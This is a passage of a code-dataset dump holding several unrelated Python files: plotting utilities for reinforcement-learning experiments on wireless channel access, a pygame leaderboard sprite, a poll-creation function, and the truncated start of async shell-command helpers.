wormNum=30)","repo_name":"Tanh-wink/Crawl","sub_path":"crawl/get_idiom.py","file_name":"get_idiom.py","file_ext":"py","file_size_in_byte":6381,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"79"} +{"seq_id":"20282723205","text":"import numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom typing import List, Tuple\n\nfrom src.utils import lineplot_ci\nfrom src.data_classes import Episode\nfrom src.view.utils import smooth_columns, add_annotation\nfrom src.view.metrics import throughput_of_agents, get_joint_policy_action, get_buffer_info, get_return, \\\n get_training_info, get_state_distribution, get_aac_info, get_loss, get_gradients_info, get_critic_training_info, \\\n get_experiment_throughput, get_channel_collisions, experiment_throughput_mean_dev, \\\n get_coma_info, get_coma_actors_info\n\n\ndef plot_episode(episode: Episode):\n max_throughput, agents_throughput, n_packets_sent = throughput_of_agents(episode)\n df_buffer = get_buffer_info([episode])\n joint_action = get_joint_policy_action(episode)\n length_episode = len(episode.history)\n plt.figure(figsize=(length_episode // 10, 12))\n plt.title(\n f\"Episode plot for n_agents={episode.metadata.env_metadata.n_agents}, \"\n f\"n_packets_max={episode.metadata.env_metadata.n_packets_max}\"\n )\n plt.plot(max_throughput)\n plt.plot(agents_throughput)\n plt.plot(df_buffer[\"sum_overflow\"], \".-\")\n plt.plot(joint_action, \"--\")\n plt.legend(\n [\"Data generated\", \"Throughput\", \"Buffer Overflow\", \"Policy\"],\n loc=\"lower left\",\n bbox_to_anchor=(1, 0, 0, 0)\n )\n plt.show()\n\n\ndef plot_training(experiment_training_episodes: List[Episode]):\n df_training = get_training_info(experiment_training_episodes)\n div_episodes = len(experiment_training_episodes) // 3\n distributions = []\n for n_episodes in [1, div_episodes, 2 * div_episodes, len(experiment_training_episodes)]:\n distributions.append(\n (f\"First {n_episodes} episodes\", get_state_distribution(experiment_training_episodes[:n_episodes]))\n )\n\n plt.figure(figsize=(12, 12))\n plt.subplots_adjust(top=1.1)\n\n # Reward\n ax = plt.subplot(3, 2, 1)\n ax.set_title(\"Total average agent reward per episode\")\n ax.set_xlabel(\"Episode\")\n ax.set_ylabel(\"Reward\")\n ax.plot(df_training[\"episode\"], df_training[\"total_reward_avg_agent\"])\n\n # ACK\n ax = plt.subplot(3, 2, 2)\n ax.set_title(\"Number of packets sent per episode\")\n ax.set_xlabel(\"Episode\")\n ax.set_ylabel(\"Number of packets\")\n ax.plot(df_training[\"episode\"], df_training[\"n_packets_sent\"])\n\n # Overflow\n ax = plt.subplot(3, 2, 3)\n ax.set_title(\"Number of packets dropped (buffer overflow) per episode\")\n ax.set_xlabel(\"Episode\")\n ax.set_ylabel(\"Number of packets\")\n ax.plot(df_training[\"episode\"], df_training[\"n_packets_dropped\"])\n\n # Collisions\n ax = plt.subplot(3, 2, 4)\n ax.set_title(\"Number of channel collisions per episode\")\n ax.set_xlabel(\"Episode\")\n ax.set_ylabel(\"Number of collisions\")\n ax.plot(df_training[\"episode\"], df_training[\"n_collisions\"])\n\n # State_distribution (categorical)\n ax = plt.subplot(3, 2, 5)\n ax.set_title(\"Distribution of state categorical variables\")\n ax.set_xlabel(\"Value\")\n ax.set_ylabel(\"Probability\")\n width = 0.3\n variables = [\"ack\", \"data_input\"]\n distributions_last_ep = distributions[-1][1]\n for i, cat in enumerate(variables):\n ax.bar(distributions_last_ep[cat].index + i * width, distributions_last_ep[cat], width)\n ax.legend([\"ack\", \"data_input\"])\n\n # Buffer state\n ax = plt.subplot(3, 2, 6)\n ax.set_title(\"Distribution of buffer state\")\n ax.set_xlabel(\"Value\")\n ax.set_ylabel(\"Probability\")\n for label, distributions_ep in distributions:\n ax.plot(distributions_ep[\"buffer\"].index, distributions_ep[\"buffer\"], label=label)\n ax.legend()\n\n\ndef plot_validation_metrics(\n subplots: Tuple[plt.Figure, List[plt.Axes]],\n experiment_episodes: List[Episode],\n lineplot_kwargs: dict = None,\n rolling_mean_window: int = 100,\n n_packets_max: int = 10,\n average_packet_generation: float = None,\n max_throughput: float = 0.5,\n show_plot: bool = True,\n):\n fig, axs = subplots\n axs = axs.flatten()\n lineplot_kwargs = lineplot_kwargs or dict()\n\n def _append_label(text: str):\n return {\n **lineplot_kwargs,\n \"label\": lineplot_kwargs.get(\"label\", \"\") + \" \" + text\n }\n\n # Get metrics\n df_buffer = get_buffer_info(experiment_episodes)\n _cols = [\"avg_buffer\", \"max_buffer\"]\n df_buffer[_cols] = smooth_columns(df_buffer, _cols, rolling_mean_window=rolling_mean_window)\n df_throughput = get_experiment_throughput(experiment_episodes)\n _cols = [\"throughput\"]\n df_throughput[_cols] = smooth_columns(df_throughput, _cols, rolling_mean_window=rolling_mean_window)\n df_collision = get_channel_collisions(experiment_episodes)\n mean_throughput, dev_throughput = experiment_throughput_mean_dev(experiment_episodes)\n\n fig.set_size_inches(15, 10)\n\n # Buffer\n axs[0].set_ylim([0, n_packets_max + 1])\n axs[0].set_title(f\"Average number of packets per agent buffer\")\n lineplot_ci(ax=axs[0], df=df_buffer, x=\"step\", y=\"avg_buffer\", **_append_label(\"avg\"))\n lineplot_ci(ax=axs[0], df=df_buffer, x=\"step\", y=\"max_buffer\", linestyle=\"dashed\", **_append_label(\"max\"))\n axs[0].legend()\n\n # Throughput\n axs[1].set_ylim([0, max_throughput])\n axs[1].set_title(f\"Mean throughput\")\n lineplot_ci(ax=axs[1], df=df_throughput, x=\"step\", y=\"throughput\",\n **_append_label(f\"({mean_throughput:.3f} +- {dev_throughput:.3f})\"))\n if average_packet_generation is not None:\n max_step = df_throughput[\"step\"].max()\n axs[1].plot(\n [0, max_step], [average_packet_generation]*2,\n color=\"black\", label=\"Avg packet generation\", linestyle=\"dashed\"\n )\n axs[1].legend()\n\n # Overflow\n axs[2].set_title(f\"Overflow cumulated sum\")\n lineplot_ci(ax=axs[2], df=df_buffer, x=\"step\", y=\"cumsum_overflow\", **lineplot_kwargs)\n axs[2].legend()\n\n # Collision\n axs[3].set_title(f\"Collisions cumulated sum\")\n lineplot_ci(ax=axs[3], df=df_collision, x=\"step\", y=\"cumsum_collision\", **lineplot_kwargs)\n axs[3].legend()\n\n if show_plot:\n plt.show()\n\n\ndef plot_validation_metrics_barplots(\n subplots: Tuple[plt.Figure, List[plt.Axes]],\n bar_pos: int,\n list_of_experiments: List[List[Episode]],\n n_steps_return: int,\n return_discount: float,\n barplot_kwargs: dict = None\n):\n _std_coef = 1.96 # 95% confidence bound\n\n def _get_mean_std(s: pd.Series):\n mean = s.mean()\n std = None\n if len(df) > 1:\n std = _std_coef * s.std()\n return mean, std\n\n # Get dataframe with metrics of multiple experiments\n data = []\n for n_experiment, experiment_episodes in enumerate(list_of_experiments):\n # Get metrics\n df_buffer = get_buffer_info(experiment_episodes)\n df_reward = get_return(experiment_episodes, n_steps_return, return_discount)\n df_throughput = get_experiment_throughput(experiment_episodes)\n df_collision = get_channel_collisions(experiment_episodes)\n # Append mean data\n data.append({\n \"n_experiment\": n_experiment,\n \"return\": df_reward[\"return\"].mean(),\n \"throughput\": df_throughput[\"throughput\"].mean(),\n \"avg_buffer\": df_buffer[\"avg_buffer\"].mean(),\n \"max_buffer\": df_buffer[\"max_buffer\"].mean(),\n \"collision\": df_collision[\"sum_collision\"].mean(),\n \"overflow\": df_buffer[\"sum_overflow\"].mean(),\n })\n\n # Build Data Frame\n df = pd.DataFrame(data)\n\n # Plot\n fig, axs = subplots\n fig.set_size_inches(10, 5)\n fig.tight_layout()\n for ax in axs:\n ax.set_xticklabels([])\n ax.set_title(\"\", fontsize=30, pad=15)\n ax.tick_params(axis='y', labelsize=20)\n\n # Throughput\n throughput_mean, throughput_std = _get_mean_std(df[\"throughput\"])\n axs[0].bar(bar_pos, throughput_mean, yerr=throughput_std, ecolor=\"black\", **barplot_kwargs)\n axs[0].title.set_text('Throughput')\n\n # Collision\n collision_mean, collision_std = _get_mean_std(df[\"collision\"])\n axs[1].bar(bar_pos, collision_mean, yerr=collision_std, ecolor=\"black\", **barplot_kwargs)\n axs[1].title.set_text('Collisions')\n\n # Buffer\n buffer_mean, buffer_std = _get_mean_std(df[\"avg_buffer\"])\n axs[2].bar(bar_pos, buffer_mean, yerr=buffer_std, ecolor=\"black\", **barplot_kwargs)\n axs[2].title.set_text('Buffer occupancy')\n\n # Overflow\n overflow_mean, overflow_std = _get_mean_std(df[\"overflow\"])\n axs[3].bar(bar_pos, overflow_mean, yerr=overflow_std, ecolor=\"black\", **barplot_kwargs)\n axs[3].title.set_text('Buffer overflow')\n\n\ndef plot_per_step_metrics(\n subplots: Tuple[plt.Figure, List[plt.Axes]],\n list_of_experiments: List[List[Episode]],\n n_steps_per_episode: int,\n n_steps_return: int,\n return_discount: float,\n lineplot_kwargs: dict = None,\n rolling_mean_window: int = 100,\n n_packets_max: int = 10,\n average_packet_generation: float = None,\n max_throughput: float = 1.0\n):\n # Get dataframe with metrics of multiple experiments\n df_list = []\n for experiment_episodes in list_of_experiments:\n # Get metrics\n df_buffer = get_buffer_info(experiment_episodes)\n df_reward = get_return(experiment_episodes, n_steps_return, return_discount)\n df_throughput = get_experiment_throughput(experiment_episodes)\n df_collision = get_channel_collisions(experiment_episodes)\n # Merge and smooth\n _merge_keys = [\"episode\", \"step\"]\n df_temp = df_buffer.merge(\n df_reward, how=\"inner\", on=_merge_keys\n ).merge(\n df_throughput, how=\"inner\", on=_merge_keys\n ).merge(\n df_collision, how=\"inner\", on=_merge_keys\n )\n _cols_to_smooth = [\n \"return\", \"reward\", \"avg_buffer\", \"max_buffer\", \"sum_overflow\", \"sum_collision\", \"throughput\"\n ]\n df_temp[_cols_to_smooth] = smooth_columns(df_temp, _cols_to_smooth, rolling_mean_window=rolling_mean_window)\n # Compute time step over all episodes\n df_temp[\"overall_step\"] = df_temp[\"step\"] + (n_steps_per_episode * df_temp[\"episode\"])\n # Store in list\n df_list.append(df_temp)\n # Concat metrics of all experiments\n df = pd.concat(df_list, ignore_index=True)\n\n # Plot\n lineplot_kwargs = lineplot_kwargs or dict()\n fig, axs = subplots\n axs = axs.flatten()\n fig.set_size_inches(15, 40)\n\n # Reward\n axs[0].set_title(f\"{n_steps_return}-steps return (smoothed {rolling_mean_window} steps)\")\n lineplot_ci(ax=axs[0], df=df, x=\"overall_step\", y=\"return\", **lineplot_kwargs)\n axs[0].legend()\n\n # Buffer\n axs[1].set_ylim([0, n_packets_max + 1])\n axs[1].set_title(f\"Average number of packets per agent buffer (smoothed {rolling_mean_window} steps)\")\n lineplot_ci(ax=axs[1], df=df, x=\"overall_step\", y=\"avg_buffer\", **lineplot_kwargs)\n axs[1].legend()\n\n # Throughput\n axs[2].set_ylim([0, max_throughput])\n axs[2].set_title(f\"Throughput (smoothed {rolling_mean_window} steps)\")\n lineplot_ci(ax=axs[2], df=df, x=\"overall_step\", y=\"throughput\", **lineplot_kwargs)\n # if average_packet_generation is not None:\n # max_step = df_throughput[\"step\"].max()\n # axs[1].plot(\n # [0, max_step], [average_packet_generation]*2,\n # color=\"black\", label=\"Avg packet generation\", linestyle=\"dashed\"\n # )\n axs[2].legend()\n\n # Overflow\n axs[3].set_title(f\"Overflow per time step (smoothed {rolling_mean_window} steps)\")\n lineplot_ci(ax=axs[3], df=df, x=\"overall_step\", y=\"sum_overflow\", **lineplot_kwargs)\n axs[3].legend()\n\n # Collision\n axs[4].set_title(f\"Collisions per time step (smoothed {rolling_mean_window} steps)\")\n lineplot_ci(ax=axs[4], df=df, x=\"overall_step\", y=\"sum_collision\", **lineplot_kwargs)\n axs[4].legend()\n\n\ndef plot_validation_metrics_per_n_steps_model_learning(\n subplots: Tuple[plt.Figure, List[plt.Axes]],\n n_steps_range: List[int],\n list_of_experiments: List[List[Episode]],\n n_steps_return: int,\n return_discount: float,\n n_packets_max: int,\n lineplot_kwargs: dict = None,\n range_return: List[float] = None,\n range_throughput: List[float] = None,\n range_collision: List[float] = None,\n range_buffer: List[float] = None,\n range_overflow: List[float] = None,\n x_step_size: int = None,\n plot_return: bool = True,\n plot_throughput: bool = True,\n plot_buffer: bool = True,\n plot_buffer_max: bool = True,\n plot_collision: bool = True,\n plot_overflow: bool = True,\n annotate_x_pos=None,\n annotate_label=None\n):\n def _annotate(ax, df, df_column, upside=True): # Should be added after setting ylim\n if annotate_x_pos is not None and annotate_label is not None:\n y_pos_arrow = df[df[\"n_steps\"] == annotate_x_pos][df_column].mean()\n x_min, x_max = ax.get_xlim()\n y_min, y_max = ax.get_ylim()\n x_length = x_max - x_min\n y_length = y_max - y_min\n annotate_x_ratio = (annotate_x_pos - x_min) / x_length\n text_x_pos = x_max - (0.2 * x_length)\n text_y_pos = (\n (y_max - (annotate_x_ratio * y_length * (2/3)))\n if upside else\n (y_min + (annotate_x_ratio * y_length * (2/3)))\n )\n add_annotation(\n ax,\n annotate_label,\n (annotate_x_pos, y_pos_arrow),\n (text_x_pos, text_y_pos),\n arrow_kwargs=dict(\n mutation_scale=15,\n linewidth=1\n ),\n text_kwargs=dict(\n fontsize=18\n )\n )\n\n def _append_label(text: str):\n return {\n **lineplot_kwargs,\n \"label\": lineplot_kwargs.get(\"label\", \"\") + \" \" + text\n }\n\n # Get dataframe with metrics of multiple experiments\n df_list = []\n for n_steps, experiment_episodes in zip(n_steps_range, list_of_experiments):\n # Get metrics\n df_buffer = get_buffer_info(experiment_episodes) if (plot_buffer or plot_overflow) else None\n if df_buffer is not None: # Normalize buffer occupancy as percentage\n df_buffer[[\"avg_buffer\", \"max_buffer\"]] = df_buffer[[\"avg_buffer\", \"max_buffer\"]] * (100 / n_packets_max)\n df_reward = get_return(experiment_episodes, n_steps_return, return_discount) if plot_return else None\n df_throughput = get_experiment_throughput(experiment_episodes) if plot_throughput else None\n df_collision = get_channel_collisions(experiment_episodes) if plot_collision else None\n df_temp = None\n for df in [df_buffer, df_reward, df_throughput, df_collision]:\n if df is not None:\n if df_temp is None:\n df_temp = df\n else:\n df_temp = df_temp.merge(df, how=\"inner\", on=[\"episode\", \"step\"])\n # Mean metrics per episode\n df_gb = df_temp.groupby(\n \"episode\", as_index=False\n ).agg({\n **({\"return\": \"mean\"} if plot_return else {}),\n **({\"throughput\": \"mean\"} if plot_throughput else {}),\n **(\n {\n \"avg_buffer\": \"mean\", \"max_buffer\": \"mean\", \"norm_overflow\": \"mean\"\n }\n if (plot_buffer or plot_overflow)\n else {}\n ),\n **({\"norm_collision\": \"mean\"} if plot_collision else {}),\n })\n df_gb[\"n_steps\"] = n_steps\n df_list.append(df_gb)\n # Concat metrics of all experiments\n df = pd.concat(df_list, ignore_index=True)\n\n # Plot\n lineplot_kwargs = lineplot_kwargs or dict()\n fig, axs = subplots\n fig.tight_layout()\n axs = axs if hasattr(axs, \"__iter__\") else [axs]\n # axs = axs.flatten()\n fig.set_size_inches(10, len(axs) * 5)\n ax_counter = 0\n\n # Reward\n if plot_return:\n lineplot_ci(ax=axs[ax_counter], df=df, x=\"n_steps\", y=\"return\", **lineplot_kwargs)\n _range_return = range_return or axs[ax_counter].get_ylim()\n axs[ax_counter].set_ylim(_range_return)\n axs[ax_counter].set_ylabel(\"Return\")\n _annotate(axs[ax_counter], df, \"return\", upside=False)\n ax_counter += 1\n\n # Buffer\n if plot_buffer:\n _range_buffer = range_buffer or [0, 110]\n axs[ax_counter].set_ylim(_range_buffer)\n _yticks = [\n n for n in range(0, 110, 10)\n if _range_buffer[0] <= n <= _range_buffer[1]\n ]\n axs[ax_counter].yaxis.set_ticks(_yticks)\n axs[ax_counter].set_yticklabels([f\"{r}%\" for r in _yticks])\n lineplot_ci(ax=axs[ax_counter], df=df, x=\"n_steps\", y=\"avg_buffer\", **_append_label(\"(avg)\"))\n if plot_buffer_max:\n _max_buffer_kwargs = {\n **_append_label(\"(max)\"),\n \"linestyle\": \"dashed\"\n }\n lineplot_ci(ax=axs[ax_counter], df=df, x=\"n_steps\", y=\"max_buffer\", **_max_buffer_kwargs)\n axs[ax_counter].set_ylabel(\"Buffer occupancy\")\n _annotate(axs[ax_counter], df, \"avg_buffer\", upside=True)\n ax_counter += 1\n\n # Throughput\n if plot_throughput:\n lineplot_ci(ax=axs[ax_counter], df=df, x=\"n_steps\", y=\"throughput\", **lineplot_kwargs)\n _range_throughput = range_throughput or axs[ax_counter].get_ylim()\n axs[ax_counter].set_ylim(_range_throughput)\n axs[ax_counter].set_ylabel(\"Throughput\")\n _annotate(axs[ax_counter], df, \"throughput\", upside=False)\n ax_counter += 1\n\n # Overflow\n if plot_overflow:\n _range_overflow = range_overflow or [0, 1.1]\n axs[ax_counter].set_ylim(_range_overflow)\n _yticks = [\n n/10 for n in range(11)\n if _range_overflow[0] <= n/10 <= _range_overflow[1]\n ]\n axs[ax_counter].yaxis.set_ticks(_yticks)\n lineplot_ci(ax=axs[ax_counter], df=df, x=\"n_steps\", y=\"norm_overflow\", **lineplot_kwargs)\n axs[ax_counter].set_ylabel(\"Buffer overflow probability\")\n _annotate(axs[ax_counter], df, \"norm_overflow\", upside=True)\n ax_counter += 1\n\n # Collision\n if plot_collision:\n _range_collision = range_collision or [0, 1.1]\n axs[ax_counter].set_ylim(_range_collision)\n axs[ax_counter].yaxis.set_ticks([0, 0.2, 0.4, 0.6, 0.8, 1])\n lineplot_ci(ax=axs[ax_counter], df=df, x=\"n_steps\", y=\"norm_collision\", **lineplot_kwargs)\n axs[ax_counter].set_ylabel(\"Collision probability\")\n _annotate(axs[ax_counter], df, \"norm_collision\", upside=True)\n ax_counter += 1\n\n # Format axes\n for ax in axs:\n ax.tick_params(labelsize=20)\n ax.xaxis.label.set_size(20)\n ax.yaxis.label.set_size(20)\n ax.set_xlabel(\"Model-learning dataset size\")\n x_start, x_end = ax.get_xlim()\n _x_step_size = x_step_size or ((x_end - x_start) // 10)\n ax.xaxis.set_ticks(np.arange(x_start+1, x_end, _x_step_size))\n\n\ndef plot_p_transmit_aac(\n ax: plt.Axes,\n experiment_name: str = None,\n df_aac: pd.DataFrame = None,\n y_min=-0.1, y_max=1.0,\n p_aloha=None, # float or list\n p_column: str = \"actor_p_transmit\",\n y_label: str = \"Probability of transmission\"\n):\n _df_aac = get_aac_info(experiment_name) if df_aac is None else df_aac\n legend = []\n ax.set_title(f\"Policy transmission probability\")\n ax.set_ylim([y_min, y_max])\n ax.set_xlabel('Number of packets in buffer')\n ax.set_ylabel(y_label)\n for (ack, data_in), dfg in _df_aac.groupby([\"ack\", \"data_input\"]):\n legend.append(f\"ACK={ack}, data_in={data_in}\")\n ax.plot(dfg[\"n_packets_buffer\"], dfg[p_column])\n\n if p_aloha is not None:\n max_buffer = df_aac[\"n_packets_buffer\"].max()\n p_aloha_list = [p_aloha] * (max_buffer + 1) if isinstance(p_aloha, float) else p_aloha\n range_buffer = range(0, max_buffer + 1)\n legend.append(\"ALOHA\")\n ax.plot(range_buffer, p_aloha_list, color='black', linestyle='dashed')\n\n ax.legend(legend)\n\n\ndef plot_critic_value_aac(\n ax: plt.Axes,\n experiment_name: str = None,\n df_aac: pd.DataFrame = None\n):\n _df_aac = get_aac_info(experiment_name) if df_aac is None else df_aac\n legend = []\n ax.set_title(f\"Critic value function\")\n ax.set_xlabel('Number of packets in buffer')\n ax.set_ylabel('Expected reward from state')\n for (ack, data_in), dfg in _df_aac.groupby([\"ack\", \"data_input\"]):\n legend.append(f\"ACK={ack}, data_in={data_in}\")\n ax.plot(dfg[\"n_packets_buffer\"], dfg[\"critic_value\"])\n ax.legend(legend)\n\n\ndef plot_training_actor_critic(\n experiment_training_episodes: List[Episode],\n return_discount: float,\n n_steps_return: int = 100,\n n_updates_smoothing: int = 10,\n actor_idx_gradient_info: int = 0,\n plot_avg_gradients: bool = True,\n plot_min_gradients: bool = False,\n plot_max_gradients: bool = False\n):\n def _select_grad_cols(columns):\n return [\n col for col in columns if (col != \"step\") and (\n (plot_avg_gradients and col.startswith(\"mean\")) or\n (plot_min_gradients and col.startswith(\"min\")) or\n (plot_max_gradients and col.startswith(\"max\"))\n )\n\n ]\n\n df_actor_training_info = get_loss(experiment_training_episodes, \"loss_actor\")\n cols = list(df_actor_training_info.columns)\n df_actor_training_info[cols] = smooth_columns(\n df_actor_training_info, cols, rolling_mean_window=n_updates_smoothing\n )\n\n df_gradients_actor = get_gradients_info(\n experiment_training_episodes, \"gradients_info_actors\", gradient_info_num=actor_idx_gradient_info\n )\n\n df_critic_training_info = get_critic_training_info(\n experiment_training_episodes,\n n_steps_return,\n return_discount\n )\n cols = list(df_critic_training_info.columns)\n df_critic_training_info_smoothed = smooth_columns(\n df_critic_training_info, cols, rolling_mean_window=n_updates_smoothing\n )\n df_gradients_critic = get_gradients_info(experiment_training_episodes, \"gradients_info_critic\")\n\n plt.figure(figsize=(50, 40))\n\n ax = plt.subplot(5, 1, 1)\n ax.plot(df_actor_training_info[\"step\"], df_actor_training_info[\"loss\"])\n ax.set_title(f\"Actor training loss (Smoothed)\")\n\n ax = plt.subplot(5, 1, 2)\n columns_grad_actor = _select_grad_cols(df_gradients_actor.columns)\n for col in columns_grad_actor:\n ax.plot(df_gradients_actor[\"step\"], np.log(1 + df_gradients_actor[col]))\n ax.set_title(f\"Actor NUM {actor_idx_gradient_info} gradients (Log Y-axis)\")\n ax.legend(columns_grad_actor)\n\n ax = plt.subplot(5, 1, 3)\n ax.plot(df_critic_training_info_smoothed[\"step\"], df_critic_training_info_smoothed[\"loss\"])\n ax.set_title(f\"Q value training loss (Smoothed)\")\n\n ax = plt.subplot(5, 1, 4)\n columns_grad_critic = _select_grad_cols(df_gradients_critic.columns)\n for col in columns_grad_critic:\n ax.plot(df_gradients_critic[\"step\"], np.log(1 + df_gradients_critic[col]))\n ax.set_title(f\"Critic gradients (Log Y-axis)\")\n ax.legend(columns_grad_critic)\n\n ax = plt.subplot(5, 1, 5)\n ax.plot(df_critic_training_info[\"step\"], df_critic_training_info[\"estimated_target\"], color=\"b\")\n ax.plot(df_critic_training_info[\"step\"], df_critic_training_info[\"estimated_value\"], color=\"orange\")\n ax.plot(df_critic_training_info[\"step\"], df_critic_training_info[\"immediate_reward\"], color=\"green\")\n ax.plot(df_critic_training_info[\"step\"], df_critic_training_info[\"discounted_n_steps_return\"], \"--\", color=\"grey\",\n alpha=0.2)\n ax.plot(df_critic_training_info_smoothed[\"step\"], df_critic_training_info_smoothed[\"discounted_n_steps_return\"],\n \"--\", color=\"purple\")\n ax.legend([\n \"Estimated target\",\n \"Estimated Q-value\",\n \"Immediate Reward\",\n f\"Discounted return ({n_steps_return} steps)\",\n f\"Discounted return ({n_steps_return} steps, Smoothed)\",\n ])\n\n\ndef plot_coma_actors_critic(\n experiment_name: str,\n n_agents: int,\n samples_critic: int = 100,\n plot_individual_actors: bool = False,\n first_time_step: int = 0,\n frame_length: int = 1,\n y_max_actor: float = 1\n):\n n_cols = frame_length\n n_rows = n_agents + 2 if plot_individual_actors else 2\n\n plt.figure(figsize=(7 * n_cols, 5 * n_rows))\n\n for slot in range(frame_length):\n p_aloha = 1 / n_agents\n\n df_coma_general = get_coma_info(\n experiment_name, samples_critic=samples_critic, time_step=(first_time_step + slot)\n )\n\n ax = plt.subplot(n_rows, n_cols, slot + 1)\n plot_p_transmit_aac(ax, df_aac=df_coma_general, y_max=y_max_actor, p_aloha=p_aloha)\n ax.set_title(f\"Policies average transmission probability slot {slot+1}\")\n\n ax = plt.subplot(n_rows, n_cols, n_cols + slot + 1)\n plot_critic_value_aac(ax, df_aac=df_coma_general)\n ax.set_title(f\"Critic value function slot {slot+1}\")\n\n if plot_individual_actors:\n df_list_coma_actors = get_coma_actors_info(experiment_name, time_step=(first_time_step + slot))\n for idx_actor, df_actor in enumerate(df_list_coma_actors):\n ax = plt.subplot(n_rows, n_cols, (idx_actor + 2) * n_cols + slot + 1)\n plot_p_transmit_aac(ax, df_aac=df_actor, y_max=y_max_actor, p_aloha=p_aloha)\n ax.set_title(f\"Actor {idx_actor} transmission probability slot {slot+1}\")\n\n\ndef plot_tdma_actors_intermediary_probabilities(\n experiment_name: str,\n n_agents: int,\n y_max_actor: float = 1,\n first_time_step: int = 0,\n frame_length: int = 1\n):\n n_cols = 1 + frame_length\n n_rows = n_agents\n plt.figure(figsize=(6 * n_cols, 5 * n_rows))\n\n # Plot slot agnostic transmission probabilities\n df_list_coma_actors = get_coma_actors_info(experiment_name, time_step=first_time_step, is_tdma_actor=True)\n for idx_actor, df_actor in enumerate(df_list_coma_actors):\n ax = plt.subplot(n_rows, n_cols, n_cols * idx_actor + 1)\n plot_p_transmit_aac(\n ax,\n df_aac=df_actor,\n y_max=y_max_actor,\n p_aloha=None,\n p_column=\"slot_agnostic_p_transmit\",\n y_label=\"Slot agnostic p_transmit\"\n )\n ax.set_title(f\"Actor {idx_actor + 1} slot agnostic transmission probability\")\n\n for slot in range(frame_length):\n df_list_coma_actors = get_coma_actors_info(\n experiment_name, time_step=first_time_step + slot, is_tdma_actor=True\n )\n\n # Mean ALOHA per slot\n n_packets_max = df_list_coma_actors[0][\"n_packets_buffer\"].max()\n expected_number_of_agents_in_slot = np.array([0.0] * (n_packets_max+1))\n for df in df_list_coma_actors:\n expected_number_of_agents_in_slot += df.groupby(\n \"n_packets_buffer\", as_index=False\n ).agg({\n \"p_slot\": \"mean\"\n }).sort_values(\n \"n_packets_buffer\"\n )[\"p_slot\"].values\n slot_occupation_dependent_p_aloha = [1/n for n in expected_number_of_agents_in_slot]\n\n # Plot slot selection\n for idx_actor, df_actor in enumerate(df_list_coma_actors):\n ax = plt.subplot(n_rows, n_cols, n_cols * idx_actor + slot + 2)\n plot_p_transmit_aac(\n ax,\n df_aac=df_actor,\n y_max=y_max_actor,\n p_aloha=slot_occupation_dependent_p_aloha,\n p_column=\"p_slot\",\n y_label=f\"Probability of selecting slot {slot+1}\"\n )\n ax.set_title(f\"Actor {idx_actor + 1} slot num. {slot+1} probability\")\n","repo_name":"kclip/bayesian-dt","sub_path":"src/view/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":28030,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"17500356679","text":"import time\n\nfrom game.environment import GameEnvironment\nfrom game.handlers.leaderboard import LeaderBoardHandler\nfrom game.sprites.text import Text\nfrom pygame.surface import Surface\n\n\nclass LeaderBoardText(Text):\n \"\"\" LeaderBoardText class extended from Text class.\n It creates the the leaderboard table sprite\n \"\"\"\n def __init__(self):\n Text.__init__(self, size=22)\n game_env = GameEnvironment()\n name_length = game_env.static.name_length * 2\n leaders = LeaderBoardHandler().load()\n seperator = self.font.render('===================================================================================================', 1, self.color)\n header = self.font.render('=== HALL OF FAME ===', 1, self.color)\n all_surfaces = []\n all_surfaces.append(seperator)\n all_surfaces.append(self.font.render(f\"{'RANK'.ljust(5)} {'NAME'.ljust(name_length)} {'SCORE'.ljust(10)} {'LEVEL'.ljust(5)} {'ACCURACY'.ljust(8)} {'TIME'.rjust(21)}\", 1, self.color))\n all_surfaces.append(seperator)\n try:\n if len(leaders) == 0:\n all_surfaces.append(self.font.render('No records, make sure you have working internet connectivity', 1, self.color))\n\n for index, score in enumerate(leaders['scores']):\n all_surfaces.append(self.font.render(f\"{str(index+1).ljust(5)} {score['name'][:name_length].ljust(name_length)} {str(score['score']).ljust(10)} {str(score['level']).ljust(5)} {str(score['accuracy'] + '%').ljust(8)} {str(time.ctime(int(score['epoch']))).rjust(25)}\", 1, self.color))\n except Exception:\n pass\n all_surfaces.append(seperator)\n\n self.surf = Surface((all_surfaces[2].get_width(), all_surfaces[0].get_height() * (len(all_surfaces) + 1)), game_env.SRCALPHA)\n\n self.surf.blit(header, (self.surf.get_width() / 2 - header.get_width() / 2, 0))\n for index, temp_surf in enumerate(all_surfaces):\n self.surf.blit(temp_surf, (0, header.get_height() + index * temp_surf.get_height()))\n\n self.rect = self.surf.get_rect(center=(game_env.static.screen_width / 2, game_env.static.screen_height / 2))\n","repo_name":"ljnath/PyBluesky-android","sub_path":"game/sprites/text/leaderboard.py","file_name":"leaderboard.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"51090499563","text":"'''\nThis use case action handles the poll creation in all its forms, if something\ngoes wrong with this operation will throw a domain exception explaining why\n'''\nfrom datetime import datetime\nimport public # type: ignore\nfrom core import entities # pylint: disable=unused-import\nfrom core.payloads.poll_payload import PollPayload\n\n@public.add\ndef new_poll(payload: PollPayload) -> 'entities.Poll': # type: ignore\n '''\n Build and persist a instance of a Poll object on every way posible. Thats\n its the SRP of this action the only reason for this function will be edited\n its that we find a new way of make a Poll object\n '''\n\n assert payload.expires_at() > datetime.now()\n assert payload.questions()\n\n if payload.poll():\n # pylint: disable=no-member\n return entities.Poll( # type: ignore\n parent=payload.poll(),\n expires_at=payload.expires_at(),\n questions=payload.questions()\n )\n\n # pylint: disable=no-member\n return entities.Poll( # type: ignore\n expires_at=payload.expires_at(),\n questions=payload.questions()\n )\n","repo_name":"ricardosiri68/justask","sub_path":"core/actions/new_poll.py","file_name":"new_poll.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"34174340582","text":"import asyncio\nimport functools\nimport shlex\nfrom typing import Tuple\n\nfrom ...core.logger import logging\n\nLOGS = logging.getLogger(__name__)\n\n\nasync def bash(cmd):\n process = await asyncio.create_subprocess_shell(\n cmd,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n )\n stdout, stderr = await process.communicate()\n err = stderr.decode().strip()\n out = stdout.decode().strip()\n return out, err\n\n\n# executing of terminal commands\nasync def runcmd(cmd: str) -> Tuple[str, str, int, int]:\n args = shlex.split(cmd)\n process = await 